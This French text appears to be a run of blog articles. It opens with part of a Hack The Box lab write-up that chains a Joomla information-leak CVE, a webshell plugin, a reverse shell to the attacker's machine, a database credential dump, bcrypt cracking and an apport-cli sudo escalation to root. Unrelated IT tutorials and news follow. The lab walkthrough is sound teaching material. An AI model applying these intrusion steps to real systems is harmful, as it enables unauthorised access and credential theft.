# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html
User-agent: *
Disallow: /administrator/
Disallow: /api/
[...]
Pas de doute, il s'agit bien d'un CMS Joomla. En parallèle du déroulement de ma méthodologie propre à Joomla, je lance l'outil nuclei :
Nuclei est un scanner de vulnérabilité web open source très intéressant. Il se compose de nombreux modules créés par la communauté. Chaque module est propre à une fuite d'information, une CVE ou une mauvaise configuration précise. La détection se porte notamment sur la détection de mots-clés dans une réponse ou la présence d'un fichier caractéristique d'une CVE/défaut de configuration.
C'est un outil intéressant à lancer en parallèle des opérations manuelles puisqu'il peut vérifier un grand nombre de choses en peu de temps, même les plus improbables.
Manuellement, je récupère la version de Joomla, là aussi grâce à des fichiers qui contiennent classiquement cette information :
$ curl -s http://dev.devvortex.htb/administrator/manifests/files/joomla.xml | xmllint --format -
<?xml version="1.0" encoding="UTF-8"?>
<extension type="file" method="upgrade">
<name>files_joomla</name>
<author>Joomla! Project</author>
<authorEmail>[email protected]</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<copyright>(C) 2019 Open Source Matters, Inc.</copyright>
<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
<version>4.2.6</version>
<creationDate>2022-12</creationDate>
La CVE impacte la version 4.2.8 (et probablement les précédentes) et notre version de Joomla est la 4.2.6, voilà qui est intéressant. Il s'agit d'une fuite d'information sans authentification. Si l'on regarde de plus près les résultats de nuclei, il a également remonté cette information (CVE) et nous indique le lien d'accès à la fuite d'information :
Un login et un mot de passe ! Mon premier réflexe est de les essayer sur l'accès SSH, mais ils donnent en fait accès au panel d'administration du Joomla :
L'administrateur du CMS peut naturellement tout faire, même rajouter un plugin qui lui donnera accès à un webshell PHP. Il en existe des prêts à l'emploi sur GitHub : https://github.com/p0dalirius/Joomla-webshell-plugin
Attention, dans un contexte réel de test d'intrusion (au sens prestation de service), évitez d'utiliser des codes tout fait trouvés sur Internet pour ce genre d'opération. Vous n'êtes pas à l'abri d'un malin qui en profiterait pour utiliser cet accès comme une backdoor pour lui-même, ou qui aurait injecté un code destructeur pour le système cible. Vous devez maîtriser les outils utilisés (faire une revue de code avant utilisation, ou faire votre propre plugin).
Je rajoute donc ce plugin, qui me donne accès à un webshell en PHP :
Vous devez vous interroger sur la deuxième commande. Il s'agit en fait d'une commande encodée en base64. Je génère une commande qui l'affiche avec echo, puis qui la décode et enfin qui exécute le résultat obtenu. Cela me permet d'injecter du code "complexe" sans me soucier des quotes, espaces et autres caractères spéciaux. La commande originale (décodée) est la suivante :
Cette commande crée un pipe et établie une connexion réseau vers l'adresse IP 10.10.16.21 sur le port 9001 (ma machine d'attaque), puis redirige un shell interactif vers cette connexion, permettant un accès distant au système.
L'utilisation de l'encodage base64 est une technique très commune et tellement connue que bon nombre de produits de sécurité considèrent maintenant l'utilisation de la commande base64 comme suspecte, ce qui entraîne des alertes de sécurité.
Après avoir mis un netcat en écoute sur le port 9001 de ma machine, je me retrouve donc avec un accès en tant que www-data sur le serveur :
$ nc -lvp 9001
listening on [any] 9001 ...
connect to [10.10.16.21] from devvortex.htb [10.10.11.242] 49096
sh: 0: can't access tty; job control turned off
$ whoami
www-data
D. Vol des identifiants de l'utilisateur logan
Maintenant que nous avons une première main sur le système, intéressons-nous aux processus et services exécutés. J'utilise la commande netstat pour récupérer les services qui ont un port en écoute :
$ netstat -petulan |grep "LISTEN"
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 0 23392 883/nginx: worker p
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 101 22905 -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 24155 -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN 114 25609 -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 114 25611 -
tcp6 0 0 :::80 :::* LISTEN 0 23393 883/nginx: worker p
tcp6 0 0 :::22 :::* LISTEN 0 24166 -
Nous voyons, en plus de services que nous connaissons déjà, un service MySQL. Nous avons auparavant récupéré des identifiants que nous pouvons tester sur ce service. Par exemple, pour lister les données de la table "users" du CMS Joomla :
$ mysql -u lewis -p"P4ntherg0t1n5r3c0n##" -e "use joomla; select * from sd4fg_users"
mysql: [Warning] Using a password on the command line interface can be insecure.
id name username email password block sendEmail registerDate lastvisitDate activation params lastResetTime resetCount otpKey otep requireReset authProvider
649 lewis lewis [email protected] $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u 0 1 2023-09-25 16:44:24 2023-11-26 10:34:39 0 NULL 0 0
650 logan paul logan [email protected] $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 0 0 2023-09-26 19:15:42 NULL {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"} NULL 0 0
Nous étions passés à côté de cette information lorsque nous avons eu accès au panel d'administration Joomla, un second utilisateur est présent et nous venons de récupérer le hash de son mot de passe.
Le code d'identification d'un hash, tel que le $2y$, est généralement utilisé pour indiquer l'algorithme de hachage et la version utilisés pour générer l'empreinte. Ici, $2y$ indique que l'empreinte a été générée à l'aide de l'algorithme bcrypt. Il n'est cependant pas obligatoire pour tous les algorithmes.
$ john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt /tmp/x
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tequieromucho (?)
1g 0:00:00:05 DONE (2023-11-26 21:55) 0.1834g/s 257.6p/s 257.6c/s 257.6C/s dianita..harry
Use the "--show" option to display all of the cracked passwords reliably
Vous noterez que John The Ripper possède lui aussi sa propre méthode de reconnaissance des hash puisqu'il a deviné tout seul qu'il s'agissait de bcrypt. J'utilise également la wordlist "rockyou.txt" comme dictionnaire pour casser ce mot de passe.
Le fichier "rockyou.txt" est un dictionnaire de mots de passe qui a gagné en notoriété en raison de sa taille et de son utilisation fréquente dans les challenges cybersécurité. Son nom vient du fait qu'il a été créé à partir de données compromises de RockYou. En 2009, cette entreprise a subi une fuite d'information où des millions de mots de passe d'utilisateurs ont été compromis. Les données ont ensuite été rendues publiques sur Internet, et le fichier "rockyou.txt" a été créé en utilisant ces informations.
Il contient 14 344 391 mots de passe couramment utilisés, souvent faibles en complexité.
Nous avons donc le mot de passe de l'utilisateur "logan" sur le CMS Joomla, utilise-t-il également ce mot de passe pour son accès SSH ?
La réponse et oui, sans surprise l'utilisateur réutilise le même mot de passe entre plusieurs services. Nous voilà avec le premier flag et un accès utilisateur au système.
E. Élévation de privilèges via apport-cli et sudo
Quels pourraient être les privilèges et accès spéciaux de l'utilisateur logan ? Je remarque qu'il possède une dérogation d'utilisation de la commande /usr/bin/apport-cli en tant que root via sudo :
logan@devvortex:~$ sudo -l
[sudo] password for logan:
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
Je ne connais pas du tout cette commande, regardons son aide avec l'option --help:
logan@devvortex:~$ /usr/bin/apport-cli --help
Usage: apport-cli [options] [symptom|pid|package|program path|.apport/.crash file]
Options:
-h, --help show this help message and exit
-f, --file-bug Start in bug filing mode. Requires --package and an
optional --pid, or just a --pid. If neither is given,
display a list of known symptoms. (Implied if a single
argument is given.)
[...]
-v, --version Print the Apport version number.
logan@devvortex:~$ /usr/bin/apport-cli -v
2.20.11
La lecture de l'aide de la commande (tronquée ci-dessus) ainsi que quelques recherches nous font comprendre qu'elle permet de remplir des tickets de bug à destination des développeurs. Elle dispose notamment d'un mode interactif à l'aide de l'option "-f". Nous pouvons également identifier sa version exacte avec l'option "-v". Je découvre que la CVE-2023-1326 (score CVSS3 : 7.8) affecte cette version :
Visiblement, apport-cli utilise less, une commande qui parait simple et inoffensive, mais qui est en réalité dangereuse lorsque utilisée avec sudo. Less dispose, en effet, d'une fonctionnalité d'exécution de commande :
Ressource : https://gtfobins.github.io/ est une excellente ressource à connaitre. Ce site liste les exploitations possibles des binaires connus sous Linux. C'est très utiles pour savoir quelles sont les fonctionnalités "cachées" et dangereuses d'un binaire exécuté via sudo ou un bit setuid (lire/ écrire dans un fichier privilégié ou pour exécuter des commandes). Ce site peut être utile également aux blue teams pour savoir si les binaires utilisés ou présents sur un système présentent un risque.
Le binaire apport-cli est donc exécuté en tant que root via sudo et utilise less, qui présente des exploitations possibles pour exécuter des commandes, voilà qui nous intéresse. La première étape consiste donc à lancer apport-cli via sudo, qui nous demande le mot de passe de logan. Ensuite, on utilise le mode interactif de apport-cli (-f) et un mode "view report" (-v) nous est proposé, c'est certainement à ce moment-là que less intervient :
Et nous voilà avec les droits root sur le système ! L'attaquant peut alors en faire ce qu'il veut, récupérer toutes les données et les identifiants qui y trainent, installer un keylogger ou l'utiliser comme rebond vers le SI interne, après tout, il est root !
III. Résumé de l'attaque
Voici une description de l'attaque réalisée en utilisant les TTP (Tactics, Techniques and Procedures) du framework MITRE ATT&CK :
Exploitation de l'utilisation cachée de less par le binaire apport-cli via sudo
IV. Notions abordées
A. Côté attaquant
L'énumération de vhost peut apparaitre comme une étape secondaire, mais elle doit faire partie de votre méthodologie d'énumération. Il est aujourd'hui rare de croiser un service Apache ne faisant tourner qu'un seul site. L'énumération de vhost peut notamment permettre de trouver des applications web non référencées comme celles en développement.
Il est important pour un attaquant de savoir récupérer le plus d'informations possibles sur sa cible afin d'avoir une vue la plus complète possible de la surface d'attaque d'un système, d'un simple script ou d'un réseau entier. Savoir identifier une version exacte et rechercher les CVE associées peut paraitre simple, mais il est très facile de passer à côté de ce type d'information pendant la phase d'énumération. Phase durant laquelle nous avons en général un grand nombre d'informations à vérifier et à collecter.
La collecte et la récupération d'identifiants est également une opération qui doit être réalisée avec minutie. Je vous recommande pendant vos challenges et prestations de scrupuleusement stocker les identifiants récupérés. Également, il est important de réutiliser ces identifiants sur tous les services croisés. La réutilisation des mots de passe entre différents services est quasiment la norme (malheureusement) en entreprise, sans compter les services de SSO qui sont faits pour n'avoir qu'un mot de passe à retenir. Cela peut sembler simple, mais la collecte d'identifiants étant réalisée tout au long de l'attaque, il est facile d'oublier de réutiliser ceux-ci sur tous les services disponibles.
Enfin, connaitre les bonnes ressources est primordiale. Vu le nombre d'informations stockées sur https://gtfobins.github.io/, vous constaterez vite qu'il est impossible de tout retenir et encore moins de se maintenir à jour. Plutôt que de retenir 1 000 informations, il est parfois plus efficace se rappeler les sources où les trouver.
B. Côté défenseur
Pour sécuriser ce système, nous pouvons proposer plusieurs recommandations :
Recommandation n°1 : nous pouvons recommander l'application stricte de la directive n°34 du Guide d'hygiène de l'ANSSI : Définir une politique de mise à jour des composants du système d’information. Les applicatifs et systèmes exposés sur le réseau ou sur Internet sont d'autant plus concernés par ce besoin de mise à jour rapide puisqu'ils peuvent être exploités par les attaquants dès la parution d'un code d'exploitation.
Recommandation n°2 : il doit également être recommandé d'utiliser un autre serveur web que le serveur web de production, exposé à internet, pour héberger le site web en développement. Les services en développement sont souvent moins bien protégés et sécurisés que les services en production (la sécurité est souvent le dernier wagon à être rattaché à un projet). Ces environnements en développement sont dans la réalité des cibles très recherchées par les attaquants et ne doivent donc pas être exposés à Internet et être strictement cloisonnés des services et réseau de production.
Recommandation n°3 : Il peut également être recommandé la mise en place d'une politique de mot de passe plus robuste. Pouvoir casser un hash, généré par algorithme de calcul robuste comme bcrypt, en quelques secondes via la wordlist la plus commune est un signal fort que les mots de passe utilisateur ne sont pas suffisamment contraints dans leur complexité. Cela va dans le sens de la directive n°10 du Guide d'hygiène de l'ANSSI : Définir et vérifier des règles de choix et de dimensionnement des mots de passe. Le guide Recommandations relatives à l'authentification multifacteur et aux mots de passe, de l'ANSSI, plus spécifique et complet sur ce sujet, peut également être une ressource à conseiller.
V. Conclusion
J’espère que cet article vous a plu ! N'hésitez pas à donner votre avis dans les commentaires ou sur notre Discord :).
Enfin, si vous voulez accéder à des cours et des modules dédiés aux techniques offensives ou défensives et améliorer vos compétences en cybersécurité, je vous oriente vers Hack The Box Academy, utilisez ce lien d'inscription (je gagnerai quelques points ) : Tester Hack the Box Academy
Rejoindre un domaine Microsoft Active Directory à partir d'une machine Linux n'est pas toujours facile. Tout d'abord parce la méthode diffère en fonction des distributions, mais également parce qu'il existe plusieurs façons pour joindre un domaine AD.
J'ai découvert l'existance d'un générateur de script bash pour rejoindre un domaine AD avec Winbind ouSSSD.
SSSD vs Winbind ?
Pourquoi utiliser SSSD plutôt que Winbind ? Voilà une très bonne question.
Pour y répondre je vais prendre (volontairement) de gros raccourcis :
Si vous êtes en mono-domaine et mono-forêt alors SSSD est recommandé
En bref : préférez SSSD qui est plus récent que winbind, il est aussi plus sécurisé et s'appuie sur Kerberos. Notez aussi que SSSD ne sait pas dialoguer avec NTLM.
Le générateur de script (de RedHat)
Le script est compatible avec RHEL 7, RHEL 8 et RHEL 9 (et toutes les distributions dérivées de RHEL dans les mêmes versions: Rocky Linux, AlmaLinux, etc).
Malheureusement ce générateur est réservé aux personnes ayant une souscription RedHat. Même si vous profitez des 16 licences développeur gratuites cela ne fonctionnera pas. Mais tout n'est pas perdu. Déjà parce que la documentation officielle RHEL est accessible à tous :
Ce script n'a rien de magique mais il permet aux débutants de ne pas se prendre la tête, grâce aux valeurs saisies en formulaire web et injectés en variables bash. Il fait aussi un backup de vos configurations actuelles par précaution.
Rejoindre un domaine AD à la main avec RHEL 8
Il est tout à fait possible de faire la même chose sans script à la mano.
Dans mon exemple le nom FQDN de mon domaine AD est "BM.LAB", son nom court est "BM" et mon compte permettant de joindre le domaine est "moncompteadmin".
Si vous êtes arrivés à la fin de cet article et que vous vous demandez pourquoi faire rejoindre une machine Linux dans un domaine AD Microsoft ? c'est vrai que j'aurais du commencer par ça.
La réponse : permettre à des utilisateurs de votre domaine AD de se connecter à des machines Linux via SSH, sans devoir le communiquer le mot de passe root ni leur créer de compte locaux. Si vous êtes tout seul à administrer vos serveurs vous n'aurez probablement pas d'intérêt à réaliser cette jointure. En revanche si vous travaillez en équipe alors dès qu'un petit nouveau arrive il vous suffit de l'ajouter dans les bon groupes pour avoir accès aux machines.
D'un point de vue sécurité : si quelqu'un quitte l'entreprise (ou votre équipe) vous n'aurez pas besoin de changer tous les mots de passe root car il ne les connait pas. En effet il a toujours utilisé son compte nominatif pour se connecter
J'espère que cet article vous aura éclairé un peu, c'est un vaste sujet et il est difficile d'en parler sans rentrer dans les détails déjà présents dans la documentation RHEL.
En cas d'erreur de connexion jetez un oeil aus logs dans /var/log/secure sur RHEL ou /var/log/messages sur Debian. Je vous partagerai encore quelques commandes utiles dans un futur article (si j'y pense ^^).
Les contrôleurs de domaine Active Directory sous Windows Server sont affectés par un nouveau problème pouvant engendrer une augmentation significative du trafic associé à l'authentification NTLM. Faisons le point sur ce problème.
Une charge plus élevée et des échecs d'authentification NTLM en masse, voici les conséquences d'un nouveau problème découvert sur les contrôleurs de domaine Active Directory. Il est lié aux mises à jour publiées le 9 avril par Microsoft, à l'occasion du Patch Tuesday d'avril 2024.
Par l'intermédiaire d'un nouveau post sur son site Internet, Microsoft a confirmé l'existence de ce problème. L'entreprise américaine apporte la précision suivante : "Ce problème est susceptible d'affecter les organisations qui ont un très faible pourcentage de contrôleurs de domaine primaires dans leur environnement et un trafic NTLM élevé." - En principe, les entreprises qui ont déjà fait le nécessaire pour désactiver NTLM ou réduire son utilisation au minimum, ne sont pas affectées.
Ce problème est présent uniquement sur les contrôleurs de domaine Active Directory sous Windows Server. Voici la liste des versions de Windows concernées, ainsi que les mises à jour à l'origine du bug :
Microsoft travaille à la résolution de ce dysfonctionnement. Aucun correctif n'est disponible pour le moment. La solution temporaire consiste à désinstaller la mise à jour problématique, si vous ne pouvez pas attendre le futur correctif.
Par ailleurs, Windows Server est affecté par un autre problème, causé par les mêmes mises à jour, et qui impacte les connexions VPN. Ce dysfonctionnement concerne aussi Windows 10 et Windows 11, comme nous l'expliquions dans notre précédent article :
Les mises à jour d'avril 2024 pour les systèmes d'exploitation Windows peuvent « casser » les connexions VPN ! Microsoft a confirmé l'existence de ce problème ! Voici ce qu'il faut savoir.
Sur le site de Microsoft, un nouveau problème, intitulé "Les connexions VPN peuvent échouer après l'installation de la mise à jour de sécurité April 2024", a fait son apparition. Microsoft a pris connaissance de ce problème après avoir reçu de nombreux signalements de la part des utilisateurs de Windows. L'entreprise américaine ne donne pas plus de précision, ni même un code d'erreur.
Ce problème affecte aussi bien Windows que Windows Server. Il est lié aux mises à jour publiées par Microsoft le 9 avril dernier, à l'occasion du Patch Tuesday d'avril 2024. Voici un récapitulatif des systèmes impactés et des mises à jour à l'origine du problème :
Pour le moment, Microsoft ne propose pas de correctif : "Nous travaillons à une solution et fournirons une mise à jour dans une prochaine version.", peut-on lire. Des investigations sont en cours et la seule solution temporaire disponible pour les utilisateurs, c'est de désinstaller la mise à jour problématique. Disons que c'est un peu la solution par défaut.
Ce n'est pas la première fois que la fonction VPN de Windows est impactée par une mise à jour. En janvier 2022, une mise à jour pour Windows 10 et Windows 11 était déjà l'origine d'un dysfonctionnement sur le VPN. En effet, à la suite de l'installation de la mise à jour, les connexions VPN L2TP étaient inutilisables.
Vous rencontrez ce problème ? N'hésitez pas à nous le dire en commentant cet article !
Dans cet article, nous allons introduire le Portail d'entreprise ou Company portal pour que vous puissiez avoir une idée plus précise de l'intérêt de cette fonctionnalité d'Intune, qui peut vous rendre bien des services.
Nous allons évoquer les fonctionnalités clés, le déploiement de l'application sur Windows, et nous découvrirons l'interface de cette même application.
II. Les fonctionnalités du Company Portal d'Intune
A. À quoi sert le Portail d'entreprise ?
Le Portail d'entreprise met à disposition des utilisateurs des informations utiles sur leur organisation et il leur donne accès à des actions pratiques en mode "self-service", comme la possibilité d'installer des applications, de déclencher la synchronisation d'un appareil ou encore de vérifier l'état de la conformité d'un appareil. Par ailleurs, l'enrollment d'un appareil peut être effectué via cette application, plutôt que par les paramètres du système.
Le Portail d'entreprise joue un rôle important dans le déploiement des applications via Intune. En effet, vous avez la possibilité de définir une des "applications en vedette", c'est-à-dire des applications disponibles et mises en avant dans le Portail d'entreprise. Ceci peut être utile pour mettre à disposition une application pour vos utilisateurs, sans que l'installation soit automatique : c'est l'utilisateur qui a la main.
Ceci s'applique aux applications dont l'option "Afficher ceci en tant qu'application à la une dans Portail d'entreprise" est définie sur "Oui". Vous pouvez tout à fait changer cette option sur vos applications existantes.
B. Les applications Portail d'entreprise
Le Portail d'entreprise Intune est accessible de plusieurs façons puisqu'il y a un portail Web et des applications, notamment une application Windows et une application mobile sur Android et iOS. N'importe quel utilisateur, à partir de son appareil inscrit et de son compte, peut accéder au Portail d'entreprise avec un navigateur via cette adresse :
Par ailleurs, l'application est accessible dans le Microsoft Store :
Désormais, nous allons voir comment déployer cette application via Intune.
III. Déployer l'application Company Portal sur Windows
Nous allons apprendre à déployer l'application Company Portal sur Windows à partir d'une stratégie d'applications Intune. Cette application étant publiée dans le Microsoft Store accessible depuis Windows, nous pouvons effectuer cette opération facilement.
Si vous n'êtes pas familier avec le déploiement d'applications du Microsoft Store via Intune, je vous recommande la lecture de cet article :
À partir du Centre d'administration Intune, vous devez créer une nouvelle application :
Cliquez sur "Applications", puis "Windows" et cliquez sur le bouton "Ajouter".
Dans le panneau latéral, choisissez le type d'application "Application Microsoft Store (nouvelle)" et suivez l'assistant.
À l'étape "Informations sur l'application", cliquez sur "Rechercher l’application Microsoft Store (nouvelle)" afin de rechercher "company portal". Sélectionnez l'application "Company portal" de type "UWP" visible dans la liste et cliquez sur "Sélectionner".
Ensuite, vous devez configurer cette application. Vous pouvez commencer par indiquer son nom en français, à savoir "Portail d'entreprise". Vous avez le choix entre une installation par utilisateur ou par machine (système). Indiquez également un logo, que vous pouvez récupérer sur Google via une recherche d'image.
Passez à l'étape "Affectations" et sélectionnez les groupes qui doivent bénéficier de cette application.
Poursuivez jusqu'à la fin pour finaliser la création de l'application.
IV. Aperçu du Company Portal sur Windows
Une fois que l'appareil aura effectué une synchronisation, l'application "Company Portal" sera visible sur Windows et vous pourrez commencer à l'explorer. L'image ci-dessous montre la section "Appareils" où l'utilisateur peut avoir un aperçu de l'ensemble des appareils dont il est déclaré comme propriétaire.
Par ailleurs, à partir du moment où une application ou plusieurs applications sont mises en avant dans le Portail d'entreprise, elles sont visibles directement dans l'interface de celui-ci. Si l'application n'est pas installée et qu'elle est disponible pour un utilisateur, il peut décider de l'installer.
Pour forcer la synchronisation d'un appareil à partir du Portail d'entreprise, Au sein de cette application, qui doit être au préalable installée sur l'appareil, cliquez sur le bouton des paramètres en bas à gauche (1) afin d'accéder au bouton nommé "Synchroniser" (2). Ceci est facilement accessible par un utilisateur lambda.
Sachez que vous avez aussi la possibilité de modifier l'apparence du Portail d'entreprise, en jouant sur les paramètres de branding de votre organisation, directement à partir du Centre d'administration Intune. En cliquant sur ce lien, vous serez redirigé directement vers la page de configuration. Au-delà de l'apparence, vous pourrez aussi activer/désactiver certaines fonctionnalités, notamment celle-ci qui peut être gênante :
Pour en savoir plus, consultez cette documentation de Microsoft :
Suite à la lecture de cet article, vous en savez plus sur le Portail d'entreprise de Microsoft Intune et vous êtes désormais en mesure de procéder à son déploiement et à sa personnalisation. Son atout principal, c'est le fait de permettre la publication d'applications auprès des utilisateurs. L'étape de branding est simple à effectuer, mais elle est importante, car elle permet d'ajouter le logo de votre entreprise, les coordonnées, etc.
Dans ce tutoriel, nous allons apprendre à déployer l'application Homer sur un NAS Synology, à l'aide d'un conteneur Docker ! Homer est un projet open source destiné à l'auto-hébergement dont l'objectif est de vous permettre de déployer une page d'accueil aux allures de tableau de bord sur votre propre serveur !
Sur cette page statique, vous allez pouvoir ajouter tous les éléments et liens que vous jugez nécessaire ! Par exemple, vous pouvez lister vos sites favoris, ajouter des liens vers vos applications préférées, ou encore vers vos équipements ! Il y a aussi la possibilité de remonter des informations à partir de services personnalisés, c'est-à-dire d'autres applications (Prometheus, AdGuard Home, Portainer, PiHole, Proxmox, etc...).
Homer peut s'avérer utile dans de nombreux scénarios et cette page est facilement personnalisable grâce à un fichier de configuration au format YAML.
Avant de créer le conteneur, nous allons préparer un répertoire pour stocker ses données. Au sein du répertoire "docker", nous allons créer le répertoire "homer" afin de maintenir la logique habituelle : un répertoire par conteneur. Ce qui donne :
Puis, dans le répertoire "homer", nous allons créer un répertoire "data" qui sera utilisé pour stocker les données applicatives d'Homer. Ce qui donne :
Désormais, nous pouvons lancer l'application Container Manager (Docker) pour créer un nouveau conteneur à partir d'un code de configuration Docker Compose.
Dans "Container Manager", cliquez sur "Projet" puis sur "Créer". Nommez ce projet "homer" puis indiquez le répertoire "/docker/homer" comme chemin pour ce conteneur. Autrement dit, l'option "Chemin" doit avoir pour valeur "/docker/homer".
En ce qui concerne la "Source", choisissez l'option "Créer un fichier docker-compose.yml". Une zone de texte apparaît : qu'allons-nous écrire ici ? Nous allons récupérer le code du fichier "docker-compose.yml" disponible sur GitHub officiel pour ensuite l'adapter.
Désormais, nous allons devoir modifier deux options : le chemin vers le répertoire local pour mapper le répertoire "/www/assets" du conteneur vers "/volume1/docker/homer/data", et les informations sur le compte utilisateur à utiliser pour exécuter le conteneur. Ici, l'utilisateur "docker" de mon NAS est spécifié en indiquant son UID "1027" et son GID "100".
Ici, nous ne modifions pas le mappage sur le numéro de port, donc l'application sera accessible sur le port 8080. Vous pouvez l'adapter si besoin. De plus, l'option "INIT_ASSETS=1" permet d'ajouter les fichiers de démonstrations à l'application, ce qui évite de partir de zéro.
Remarque : pour le nom de l'image, vous pouvez ajouter le tag "latest" pour récupérer la dernière image Docker de ce projet associée à ce tag. Ce qui donne la valeur "b4bz/homer:latest" pour la directive "image".
Une fois le fichier Docker Compose prêt, vous pouvez continuer jusqu'à la fin pour créer le conteneur. L'image "b4bz/homer" sera téléchargée à partir du Docker Hub et utilisée pour exécuter le conteneur.
Voilà, le conteneur Docker "homer" est actif !
Dès à présent, nous pouvons accéder à l'interface de l'application :
http://<adresse IP du NAS>:8080
Vous devriez obtenir ceci :
Désormais, nous allons évoquer la personnalisation de cette page d'accueil.
III. Personnaliser la page d'accueil Homer
Pour modifier la page d'accueil d'Homer, nous allons éditer le fichier suivant :
/docker/homer/data/config.yml
Pour l'éditer directement depuis l'interface de DSM, installez l'application "Éditeur de texte" depuis le "Centre de paquets". Ceci permet d'ajouter l'option "Ouvrir avec un éditeur de texte" dans le menu contextuel de DSM afin d'éditer les fichiers en ligne.
Le fichier de configuration s'ouvre. Il s'agit d'un fichier au format YAML, donc il faut respecter rigoureusement l'indentation, les espaces, etc... Pour ne pas générer de problèmes de syntaxes. L'édition est assez simple puisque le code est facilement lisible.
Vous pouvez charger vos images dans le répertoire "data/tools" de votre conteneur pour les appeler en tant que logo dans Homer. Par ailleurs, Homer s'appuie sur la bibliothèque FontAwesome pour charger les icônes, donc utilisez cette page pour rechercher un logo à intégrer sur une entrée (par exemple "fas fa-hdd" pour l'icône en forme de disque dur).
À titre d'exemple, voici le code du nœud « services » qui permet d'obtenir le résultat présenté ci-dessus avec les deux blocs "Mes sites favoris" et "Mes NAS".
# Services
# First level array represent a group.
# Leave only a "items" key if not using group (group name, icon & tagstyle are optional, section separation will not be displayed).
services:
- name: "Mes sites favoris"
icon: "fas fa-cloud"
items:
- name: "IT-Connect"
logo: "assets/tools/Logo-IT-Connect.png"
subtitle: "Tutoriels, cours, actualités - Informatique"
tag: "tutos"
keywords: "tutos"
url: "https://www.it-connect.fr"
target: "_blank" # optional html a tag target attribute
- name: "Mes NAS"
icon: "fas fa-hdd"
items:
- name: "NAS Synology DS220+"
icon: "fas fa-hdd"
subtitle: "https://192.168.1.200:5001"
tag: "nas"
keywords: "nas"
url: "https://192.168.1.200:5001"
target: "_blank" # optional html a tag target attribute
- name: "NAS Synology DS923+"
icon: "fas fa-hdd"
subtitle: "https://192.168.1.201:5001"
tag: "nas"
keywords: "nas"
url: "https://192.168.1.201:5001"
target: "_blank" # optional html a tag target attribute
Quand vous effectuez une modification, enregistrez le fichier et rafraichissez la page web pour voir ce que ça donne. Homer étant une page d'accueil statique, elle est très rapide à charger et très légère.
L'intégration des services personnalisés s'effectue aussi dans ce fichier. Référez-vous à la documentation afin de copier-coller le bloc de configuration correspondant à votre service :
En suivant ce tutoriel, vous devriez être en mesure d'installer Homer sur votre NAS Synology à l'aide de Docker ! C'est une application pratique et facile à personnaliser que l'on peut utiliser pour se créer une page d'accueil pour son Home Lab, ou, pour créer un portail d'entreprise léger, self-hosted, avec un ensemble de liens utiles.
Il y a des alternatives à Homer, notamment Heimdall, mais aussi Homarr qui est plus complet, mais aussi beaucoup plus lourd.
Pour aller plus loin, je vous recommande de publier cette application avec le reverse proxy de DSM, ce qui permettra d'avoir un certificat TLS et d'utiliser un nom de domaine. Référez-vous à ce tutoriel :
Aaah Nano, cet éditeur en ligne de commande si apprécié des geeks ! Simple, léger, accessible… Et il continu de s’améliorer puisque la version 8 vient de sortir et apporte son lot de nouveautés plutôt cool.
Déjà, les développeurs ont revu les raccourcis clavier par défaut pour coller aux standards. Fini le temps où on se mélangeait les pinceaux entre les éditeurs ! On retrouve maintenant les classiques Ctrl+F pour chercher, Ctrl+B pour chercher en arrière, Alt+F / Alt+B pour répéter la recherche et Alt+R pour remplacer. Les devs ont même pensé à ajouter l’option --modernbindings (ou -/ pour les flemmards) pour avoir des raccourcis façon Ctrl+X (quitter), Ctrl+C (copier), Ctrl+V (coller)… Un vrai bonheur !
Mais là où Nano pousse le bouchon encore plus loin (Maurice) c’est avec ses fonctionnalités bien geek. Saviez-vous par exemple qu’on peut désormais ouvrir un fichier directement à une ligne spécifique en rajoutant +numLigne après son nom ?
Les raccourcis Alt+Home et Alt+End permettent aussi de sauter en haut ou en bas du fichier en un clin d’œil, sans bouger le curseur. Idéal pour avoir une vue d’ensemble de son code. Et si vous souhaitez vous repérer dans vos sections avec des ancres et bien avec Alt+ » vous pouvez en placer à la volée et y revenir avec Alt+’. Super pratique pour naviguer dans vos documents !
Côté personnalisation, les amateurs de couleurs seront ravis puisque lorsque les trois chiffres d’un code #RGB sont identiques, Nano le mappe à l’échelle de gris xterm. Résultat, on passe de 4 à 14 nuances de gris pour styliser son terminal.
Et pour les irréductibles de la souris, sachez que la molette permet maintenant de scroller dans le fichier sans changer la position du curseur. C’est tout bête mais tellement pratique pour explorer rapidement un fichier.
Depuis janvier 2023, l'authentification basique a été supprimée pour les protocoles POP, IMAP et Active Sync dans Exchange Online. Pour l'envoi des e-mails, le protocole SMTP utilisant l'authentification basique est toujours en vigueur.
Cependant, Microsoft a annoncé la fin de l'authentification basique pour SMTP, prévue pour septembre 2025. Cette modification impactera smtp.office365.com et smtp-legacy.office365.com.
II. Authentification basique vs authentification moderne
A. Fonctionnement authentification basique
L’authentification basique (Basic Authentication en anglais) est une méthode permettant de s’authentifier à un service en envoyant son nom d’utilisateur et son mot de passe. Pour garantir la sécurité des données échangées, le chiffrement TLS est couramment utilisé pour assurer la confidentialité des communications.
L'authentification basique est parfois appelée "proxy authentication" car le client de messagerie envoie le nom d’utilisateur et le mot de passe à Exchange Online, qui les transmet (ou "proxy") ensuite au fournisseur d'identités faisant autorité.
Dans un fonctionnement classique, l’authentification basique avec Exchange Online fonctionne comme suit :
